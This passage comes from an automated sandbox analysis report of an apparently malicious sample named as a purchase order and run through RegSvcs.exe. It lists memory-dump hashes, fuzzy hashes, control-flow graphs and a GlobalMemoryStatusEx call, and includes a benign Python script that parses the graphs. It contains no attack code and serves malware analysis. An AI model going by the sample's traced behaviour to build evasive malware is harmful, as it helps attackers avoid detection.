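On the excerpt this yields three groups: the three functions with the hashes beginning 99E11974, C7E1FB74 and F2E11974 (at most 8 positions apart), the T(z pair (13 positions apart) and the ax^ pair (11 apart), while any two functions from different groups differ in more than 30 of the 70 positions. The threshold is therefore not delicate for this data, but it should be re-derived for each report rather than reused blindly.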
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e61be117062bcfca9d7915ec7b69ca7d77bd94b4c9843a776542d830bf89cd4f
                                              • Instruction ID: f69c7d4f64b5093c5bac2b0f0a68130dfb06c9ea8afa0818cc1afde65f4bdce9
                                              • Opcode Fuzzy Hash: e61be117062bcfca9d7915ec7b69ca7d77bd94b4c9843a776542d830bf89cd4f
                                              • Instruction Fuzzy Hash: A6D1F63192075ACACB11EFA4D990AD9F7B1FF95300F10979AD50977224EF70AAC9CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a758bf480db5568b1654d953d7963d34c990b6b4a371aa1914d2753744444f5
                                              • Instruction ID: f887f8c8b447163c2a8d710ceb419b73212b9a696d607bc8aab49f9a2859a0ce
                                              • Opcode Fuzzy Hash: 9a758bf480db5568b1654d953d7963d34c990b6b4a371aa1914d2753744444f5
                                              • Instruction Fuzzy Hash: 80A15B32E00209CFCF05DFA8D9405AEB7B2FF85300B15857AEA05EB266DB35E956CB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 021b72ceee24625e06bf0ecda8dff1543dadd992be229c53ada1e815d09a4a9a
                                              • Instruction ID: 677996ff84360d47ca8f69092754d0f60a9aa6c801d8f13a420e00885a8263f3
                                              • Opcode Fuzzy Hash: 021b72ceee24625e06bf0ecda8dff1543dadd992be229c53ada1e815d09a4a9a
                                              • Instruction Fuzzy Hash: EED1F63192075ACACB11EFA4D950AD9F7B1FF95300F10979AE50977224EF70AAC9CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a920ecd7bcedea3c8c8c7fe9a9c4de3026807aebc7d32ad590ef88581731878a
                                              • Instruction ID: bbee18113ed28306a3c709ab284b21734af626e6f1b2b1b7a86fea9c35e69f81
                                              • Opcode Fuzzy Hash: a920ecd7bcedea3c8c8c7fe9a9c4de3026807aebc7d32ad590ef88581731878a
                                              • Instruction Fuzzy Hash: B1418735B04159DFCB04CFA8EA908AEFBB7EF88210F50456BE506EB254DA32DD51C782
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f87f27a6828e47b4afe50fc96be8a3c9b79233781053d1316f0c5c1ae38e990
                                              • Instruction ID: bc61ebb7e2e69f6e7b02b855c32175d1c11441bfe49dcce4a3dbd4ed7b404556
                                              • Opcode Fuzzy Hash: 5f87f27a6828e47b4afe50fc96be8a3c9b79233781053d1316f0c5c1ae38e990
                                              • Instruction Fuzzy Hash: C0417635B14159DFCB04CFA8E9808AEFBB7EF88310F50456AE506EB254DA32DD51CB82

                                              Execution Graph

                                              Execution Coverage: 11.8%
                                              Dynamic/Decrypted Code Coverage: 100%
                                              Signature Coverage: 0%
                                              Total number of Nodes: 3
                                              Total number of Limit Nodes: 0
                                              execution_graph (per node: id, address, annotation, successors)
                                              • 22395 69aea40 -> 22396
                                              • 22396 69aea86 GlobalMemoryStatusEx -> 22397
                                              • 22397 69aeab6 (no successors)
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: 826a8ff6bd7fa2e2e7bf5f2a9bceec55c16d2b9232a095cf0a88304ee9db6a93
                                              • Instruction ID: 37fdb33cabd6bb3ebc45ce4465ac0a28edb83a6004191348c784debee05548c5
                                              • Opcode Fuzzy Hash: 826a8ff6bd7fa2e2e7bf5f2a9bceec55c16d2b9232a095cf0a88304ee9db6a93
                                              • Instruction Fuzzy Hash: 39914D70E00209DFDF18CFA9C9957DEBBF2BF98318F148529E415A7258EB749885CB81
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78c7becf16530104637898d580fcd763c493aa11e7ed4cabacfefa6942528a3a
                                              • Instruction ID: cdb014577b96321935f0b724c1d4fcbf62463ed33eec0544b94169b6a6142b01
                                              • Opcode Fuzzy Hash: 78c7becf16530104637898d580fcd763c493aa11e7ed4cabacfefa6942528a3a
                                              • Instruction Fuzzy Hash: 60B16F70E00209DFDF18CFA9C98179DBBF2BF88358F148529D855EB258EB749885CB81

                                              Control-flow Graph

                                              control_flow_graph (per basic block: id, address range, annotation, successors; listed in address order)
                                              • 1216 1314810-131489c -> 1219, 1220
                                              • 1220 131489e-13148a9 -> 1219, 1222
                                              • 1222 13148ab-13148b7 -> 1223, 1224
                                              • 1223 13148b9-13148c3 -> 1225, 1226
                                              • 1225 13148c5 -> 1226
                                              • 1226 13148c7-13148d6 -> 1226, 1228
                                              • 1228 13148d8 -> 1224
                                              • 1224 13148da-13148e4 -> 1221
                                              • 1219 13148e6-13148e8 -> 1221
                                              • 1221 13148ea-1314902 -> 1229, 1230
                                              • 1229 1314904-131490f -> 1230, 1232
                                              • 1232 1314911-131491d -> 1233, 1234
                                              • 1234 131491f-1314929 -> 1236, 1237
                                              • 1236 131492b -> 1237
                                              • 1237 131492d-131493c -> 1237, 1238
                                              • 1238 131493e -> 1233
                                              • 1233 1314940-131494a -> 1231
                                              • 1230 131494c-131494e -> 1231
                                              • 1231 1314950-13149a9 -> 1241, 1242
                                              • 1242 13149ab-13149b1 -> 1241
                                              • 1241 13149b2-13149d2 -> 1246
                                              • 1246 13149dc-1314a0f -> 1249, 1250
                                              • 1249 1314a11-1314a15 -> 1250, 1251
                                              • 1251 1314a17-1314a1a call 1310ab8 -> 1250
                                              • 1250 1314a1f-1314a23 -> 1252, 1253
                                              • 1253 1314a25-1314a29 -> 1252, 1255
                                              • 1255 1314a2b-1314a2e call 1310ab8 -> 1252
                                              • 1252 1314a33-1314a37 -> 1256, 1257
                                              • 1257 1314a39-1314a3d -> 1256, 1261
                                              • 1261 1314a3f -> 1256
                                              • 1256 1314a47-1314a4b -> 1258, 1259
                                              • 1259 1314a4d-1314a51 -> 1258, 1262
                                              • 1262 1314a53 -> 1258
                                              • 1258 1314a5b -> 1263
                                              • 1263 1314a5c -> 1263
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: 0067da0a5c73e3cea4e888857ae0b8982d03da6a762caf984d9e49fb79b45c97
                                              • Instruction ID: aec268ed735ac1c9edb3916557a8baf28c059d13a6a8cce302acc3303a941fc6
                                              • Opcode Fuzzy Hash: 0067da0a5c73e3cea4e888857ae0b8982d03da6a762caf984d9e49fb79b45c97
                                              • Instruction Fuzzy Hash: FD716EB1E00249CFDB18DFA9C98079EBFF2AF88318F148129E415A7258EB749845CB95

                                              Control-flow Graph

                                              control_flow_graph (per basic block: id, address range, annotation, successors; listed in address order)
                                              • 1167 1314804-131489c -> 1171, 1172
                                              • 1172 131489e-13148a9 -> 1171, 1174
                                              • 1174 13148ab-13148b7 -> 1175, 1176
                                              • 1175 13148b9-13148c3 -> 1177, 1178
                                              • 1177 13148c5 -> 1178
                                              • 1178 13148c7-13148d6 -> 1178, 1180
                                              • 1180 13148d8 -> 1176
                                              • 1176 13148da-13148e4 -> 1173
                                              • 1171 13148e6-13148e8 -> 1173
                                              • 1173 13148ea-1314902 -> 1181, 1182
                                              • 1181 1314904-131490f -> 1182, 1184
                                              • 1184 1314911-131491d -> 1185, 1186
                                              • 1186 131491f-1314929 -> 1188, 1189
                                              • 1188 131492b -> 1189
                                              • 1189 131492d-131493c -> 1189, 1190
                                              • 1190 131493e -> 1185
                                              • 1185 1314940-131494a -> 1183
                                              • 1182 131494c-131494e -> 1183
                                              • 1183 1314950-13149a9 -> 1193, 1194
                                              • 1194 13149ab-13149b1 -> 1193
                                              • 1193 13149b2-13149c0 -> 1197
                                              • 1197 13149c8-13149d2 -> 1198
                                              • 1198 13149dc-1314a0f -> 1201, 1202
                                              • 1201 1314a11-1314a15 -> 1202, 1203
                                              • 1203 1314a17-1314a1a call 1310ab8 -> 1202
                                              • 1202 1314a1f-1314a23 -> 1204, 1205
                                              • 1205 1314a25-1314a29 -> 1204, 1207
                                              • 1207 1314a2b-1314a2e call 1310ab8 -> 1204
                                              • 1204 1314a33-1314a37 -> 1208, 1209
                                              • 1209 1314a39-1314a3d -> 1208, 1213
                                              • 1213 1314a3f -> 1208
                                              • 1208 1314a47-1314a4b -> 1210, 1211
                                              • 1211 1314a4d-1314a51 -> 1210, 1214
                                              • 1214 1314a53 -> 1210
                                              • 1210 1314a5b -> 1215
                                              • 1215 1314a5c -> 1215
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: 59f9647a81482fcee969e1da65ce266cbafded10e0bc3a59f11a33ba3a6c16cf
                                              • Instruction ID: 224ad11ce282d789133872679b46cb7cf0948c312efcbb6fd4ae43967d7b93df
                                              • Opcode Fuzzy Hash: 59f9647a81482fcee969e1da65ce266cbafded10e0bc3a59f11a33ba3a6c16cf
                                              • Instruction Fuzzy Hash: 32716DB1D00249CFDB14DFA9D9847DEBFF2AF48318F148129E814A7258EB749845CF95

                                              Control-flow Graph

                                              control_flow_graph (per basic block: id, address range, annotation, successors; listed in address order)
                                              • 1379 69ae6d0-69aea7e -> 1381
                                              • 1381 69aea86-69aeab4 GlobalMemoryStatusEx -> 1382, 1383
                                              • 1383 69aeab6-69aeabc -> 1382
                                              • 1382 69aeabd-69aeae5 (no successors)
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 069AEAA7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1788465510.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_69a0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 5cf6cf1dd80c776cd285efe33e88727a0b59e9809983c3d5c3a32d48e7559900
                                              • Instruction ID: af8f6990bbd25137ea09e315890761e5cbb712798a404bfcdc52e4f1a3c7e3e0
                                              • Opcode Fuzzy Hash: 5cf6cf1dd80c776cd285efe33e88727a0b59e9809983c3d5c3a32d48e7559900
                                              • Instruction Fuzzy Hash: 0A2124B1C006599FCB10DF9AC844BDEFBF9EF48320F14816AD814A7651D378A944CFA5

                                              Control-flow Graph

                                              control_flow_graph (per basic block: id, address range, annotation, successors; listed in address order)
                                              • 1386 69aea40-69aeab4 GlobalMemoryStatusEx -> 1388, 1389
                                              • 1389 69aeab6-69aeabc -> 1388
                                              • 1388 69aeabd-69aeae5 (no successors)
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 069AEAA7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1788465510.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_69a0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 8cbb09d6e62c47b08449f23c77868e6cd73f7c95945119508ec20a254c0342bb
                                              • Instruction ID: 8ab4ffaeb59f8206acbdd8b725bdd1fb82c7c349ae46adde9acb14ef68f8012f
                                              • Opcode Fuzzy Hash: 8cbb09d6e62c47b08449f23c77868e6cd73f7c95945119508ec20a254c0342bb
                                              • Instruction Fuzzy Hash: 4711EFB1C006699BCB10DF9AD544BDEFBF5FB48324F14816AD818A7250D378A944CFA5
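The report tool exports each execution graph and control-flow graph in this section as one line of tokens: a decimal node id followed by a hex address or address range, optionally an annotation (an API name such as GlobalMemoryStatusEx, or `call <target>`), and `src->dst` edges. The following Python is an added example, not code from the report or from Joe Sandbox: it parses that line form into blocks and edges and answers the questions an analyst usually has about one of these functions, namely where it enters, which blocks call out (here the GlobalMemoryStatusEx block in RegSvcs.exe and the two `call 1310ab8` sites of the larger function), which blocks loop on themselves, and the shortest path from the entry to a block of interest. The two graph strings are copied from this section; the token-layout rules the parser relies on are an assumption of this example derived from those strings.

```python
"""
Parse the one-line graph form exported by the sandbox report
("<name> <id> <addr>[-<addr>] [annotation ...] <src>-><dst> ...") and
query it. Added example, not code from the report or from Joe Sandbox;
the two graph strings are copied from the report, the layout rules are
an assumption of this example.
"""
import re
from collections import deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")

# Copied from the report (RegSvcs.exe, PID 8): execution graph and the CFG of the function at 0x1314810.
EXEC_GRAPH = ("execution_graph 22395 69aea40 22396 69aea86 GlobalMemoryStatusEx "
              "22395->22396 22397 69aeab6 22396->22397")
CFG_1314810 = (
    "control_flow_graph 1216 1314810-131489c 1219 13148e6-13148e8 1216->1219 1220 131489e-13148a9 "
    "1216->1220 1221 13148ea-1314902 1219->1221 1220->1219 1222 13148ab-13148b7 1220->1222 "
    "1229 1314904-131490f 1221->1229 1230 131494c-131494e 1221->1230 1223 13148b9-13148c3 "
    "1222->1223 1224 13148da-13148e4 1222->1224 1225 13148c5 1223->1225 1226 13148c7-13148d6 "
    "1223->1226 1224->1221 1225->1226 1226->1226 1228 13148d8 1226->1228 1228->1224 1229->1230 "
    "1232 1314911-131491d 1229->1232 1231 1314950-13149a9 1230->1231 1241 13149b2-13149d2 "
    "1231->1241 1242 13149ab-13149b1 1231->1242 1233 1314940-131494a 1232->1233 "
    "1234 131491f-1314929 1232->1234 1233->1231 1236 131492b 1234->1236 1237 131492d-131493c "
    "1234->1237 1236->1237 1237->1237 1238 131493e 1237->1238 1238->1233 1246 13149dc-1314a0f "
    "1241->1246 1242->1241 1249 1314a11-1314a15 1246->1249 1250 1314a1f-1314a23 1246->1250 "
    "1249->1250 1251 1314a17-1314a1a call 1310ab8 1249->1251 1252 1314a33-1314a37 1250->1252 "
    "1253 1314a25-1314a29 1250->1253 1251->1250 1256 1314a47-1314a4b 1252->1256 "
    "1257 1314a39-1314a3d 1252->1257 1253->1252 1255 1314a2b-1314a2e call 1310ab8 1253->1255 "
    "1255->1252 1258 1314a5b 1256->1258 1259 1314a4d-1314a51 1256->1259 1257->1256 "
    "1261 1314a3f 1257->1261 1263 1314a5c 1258->1263 1259->1258 1262 1314a53 1259->1262 "
    "1261->1256 1262->1258 1263->1263"
)


def parse_graph(line):
    """Return (name, blocks, edges): blocks = {id: {start, end, notes}}, edges in report order."""
    tokens = line.split()
    name, tokens = tokens[0], tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].partition("-")  # single address: end == start
            current = {"start": int(start, 16), "end": int(end or start, 16), "notes": []}
            blocks[int(tok)] = current
            i += 2
        elif current is None:
            raise ValueError(f"annotation {tok!r} before any block")
        elif tok == "call" and i + 1 < len(tokens):
            current["notes"].append(f"call {tokens[i + 1]}")
            i += 2
        else:
            current["notes"].append(tok)  # e.g. an API name attached to the block
            i += 1
    return name, blocks, edges


def entry_blocks(blocks, edges):
    """Blocks with no predecessor other than themselves: the function entry."""
    targets = {dst for src, dst in edges if src != dst}
    return sorted(b for b in blocks if b not in targets)


def self_loops(edges):
    return sorted({src for src, dst in edges if src == dst})


def annotated_blocks(blocks):
    return {b: info["notes"] for b, info in blocks.items() if info["notes"]}


def shortest_path(edges, src, dst):
    """BFS over the edge list; list of block ids from src to dst, or None if unreachable."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    prev, queue = {src: None}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in succ.get(node, []):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


if __name__ == "__main__":
    for line in (EXEC_GRAPH, CFG_1314810):
        name, blocks, edges = parse_graph(line)
        entry = entry_blocks(blocks, edges)[0]
        print(f"{name}: {len(blocks)} blocks, {len(edges)} edges, entry {entry} at {blocks[entry]['start']:x}")
        for b, notes in annotated_blocks(blocks).items():
            print(f"  block {b} @ {blocks[b]['start']:x}: {', '.join(notes)}; path: {shortest_path(edges, entry, b)}")
        print(f"  self-loops: {self_loops(edges)}")
```

For the larger function the parser recovers 35 blocks and 54 edges, a single entry block (1216), the two `call 1310ab8` blocks (1251 and 1255) and three self-looping blocks (1226, 1237 and 1263); the shortest path from the entry to the first call site runs 1216, 1219, 1221, 1230, 1231, 1241, 1246, 1249, 1251. Because the parser keeps the edge order the report uses, the BFS is deterministic, which matters when the same query is re-run across reports to compare how a function's call sites are reached.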
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: b720fca1ca76efc672025c3d743bcb3ac3932fc25b75d1df0eeb563141c9ab97
                                              • Instruction ID: bc1afd4d9c5382a26d91189af004fa6307d811b992badb5b09d2ea5643816488
                                              • Opcode Fuzzy Hash: b720fca1ca76efc672025c3d743bcb3ac3932fc25b75d1df0eeb563141c9ab97
                                              • Instruction Fuzzy Hash: C0A16B71E00209DFDB18CFA9D9857DEFBF2BF88318F148129E815A7258EB749845CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: c8be63c2ce85919d6ac41ee73d8d303a18be5d78227943cf8627f597168f495b
                                              • Instruction ID: 6f7639040f602ca031662b318f024b0fc456a4fa9905c32f015d71c18f343ace
                                              • Opcode Fuzzy Hash: c8be63c2ce85919d6ac41ee73d8d303a18be5d78227943cf8627f597168f495b
                                              • Instruction Fuzzy Hash: 9D31AF31E102499FDB2ACF79C9417AEB7B2EF85304F64852AE805EB299DB709C45CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: 04f311f6ecd2b38f4854c4b430a2cd7750a828beced18a72f19b9c9ddd394e4e
                                              • Instruction ID: bf8ca53e0534aa2aaa4c6caf12ac22b8101d10ecf5812fb61ac0897f341cebb6
                                              • Opcode Fuzzy Hash: 04f311f6ecd2b38f4854c4b430a2cd7750a828beced18a72f19b9c9ddd394e4e
                                              • Instruction Fuzzy Hash: 6931A131E102499FDB2ACF79C8417AEB7B2EF89304F64852AE805EB395DB749C45CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: 6fa14c8e757c1403184b483a2e78816e3218d2157e86224648a4467665827795
                                              • Instruction ID: ee81cf920f25329f5b59c460bd307bce5469d4d33ac7b92302cec8ac5006675c
                                              • Opcode Fuzzy Hash: 6fa14c8e757c1403184b483a2e78816e3218d2157e86224648a4467665827795
                                              • Instruction Fuzzy Hash: 01618E347002158FCB18DB68C598AAE7BF6EF8D704F2444A9E406EB3A9DB75DC41CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: ce9014cb01392a3c979467ff2557771f99844b9ff40572e6e2890bb911d1c9d3
                                              • Instruction ID: 3c44d39bed89afd38a3fc2a01b3c1dcc9c9a11d3a857a2e26b336189e4721d9a
                                              • Opcode Fuzzy Hash: ce9014cb01392a3c979467ff2557771f99844b9ff40572e6e2890bb911d1c9d3
                                              • Instruction Fuzzy Hash: 3D317031E10209DFDB29DF69C4407AEB7B6FF89304F64852AE505EB284DB74AD45CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: f360a104de6b72cb60eb28d618edfc7beca9e9ff1fb47e5992315a16aa09724e
                                              • Instruction ID: a4d53f7a011b6b606c98fef4cee732e5f20ea67137352827304a736713427bd1
                                              • Opcode Fuzzy Hash: f360a104de6b72cb60eb28d618edfc7beca9e9ff1fb47e5992315a16aa09724e
                                              • Instruction Fuzzy Hash: 7E0100317041049FD715EB7894153AFBBE2EB8A300F20887AD01AC7394EA3598418B82
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dfb18d8da38c435ec8ac75620e028a237721ce02fbfaffa1dea22a81d1d904f5
                                              • Instruction ID: 6404cc1b89befb22673048df30ae631e1ccc976873d554aa5320f5c5304342ea
                                              • Opcode Fuzzy Hash: dfb18d8da38c435ec8ac75620e028a237721ce02fbfaffa1dea22a81d1d904f5
                                              • Instruction Fuzzy Hash: 24125E30741206AFCF1AEB6DE44426D73A2FB89315B504E3AD006CB759CF31EC8A9B95
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7de676d14e29d9190c91c38b0858a08ee12ceaa7ab5c5e7c75dc5f4adcefa319
                                              • Instruction ID: 75136c27da3a9c734992ef1b25eeb388d03bbaf6f5f1faaaf7b504baeccadebf
                                              • Opcode Fuzzy Hash: 7de676d14e29d9190c91c38b0858a08ee12ceaa7ab5c5e7c75dc5f4adcefa319
                                              • Instruction Fuzzy Hash: 9BE1C334B011459FDB19DB6CD594AAEBBB2FF88315F108425E50AD7399DB30DC46CB50
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b1ebf5053b73282f30c0467f5236c932d75866eff7c81cda68c229b147aee04
                                              • Instruction ID: ee2535448307cbde965f25f8aaff6c6df39d20de7679912c536c3506fa146cb6
                                              • Opcode Fuzzy Hash: 3b1ebf5053b73282f30c0467f5236c932d75866eff7c81cda68c229b147aee04
                                              • Instruction Fuzzy Hash: 31B15B70E00209DFDF18CFA9D98179DBBF1BF48318F248529D855EB298EB749885CB81
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7c93647f0c4ef1d6eae1b0fedd302e1bd3767a92bb00c115bf97e4f05ee6772
                                              • Instruction ID: d9cce2e97f809d9b28f0297f32ea7d714de17c8e21592550ad3dc5e74b3c9d76
                                              • Opcode Fuzzy Hash: c7c93647f0c4ef1d6eae1b0fedd302e1bd3767a92bb00c115bf97e4f05ee6772
                                              • Instruction Fuzzy Hash: 89515C71A01205DFDB04DFA9E884799FBB2FF88315F14C269E9089B39AE770D945CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdc5a1bca5cb023d6d5e0b47a79fc28709bae13e69fc2c4286c34bb2d4a99cea
                                              • Instruction ID: f65241537474d954ac9d452ade6c04ba4db79440b4e0a2855df6d35f3ecf39d9
                                              • Opcode Fuzzy Hash: fdc5a1bca5cb023d6d5e0b47a79fc28709bae13e69fc2c4286c34bb2d4a99cea
                                              • Instruction Fuzzy Hash: 405105B0D102188FDB18CFA9C985B9DBBF1FF48314F148529D819AB359D7B4A884CF95
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 357a56e76efff1797a70ae863ce6e489e2d95917526fd84185f936f3155fde9f
                                              • Instruction ID: 141bfd64a776c84cfb77ecf614ee92f040f86f1d341b6f60ab4db8a0d306c910
                                              • Opcode Fuzzy Hash: 357a56e76efff1797a70ae863ce6e489e2d95917526fd84185f936f3155fde9f
                                              • Instruction Fuzzy Hash: 185104B0D102188FDB18CFA9C985B9DBBF5FF48314F148119E819AB369D7B4A884CF95
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
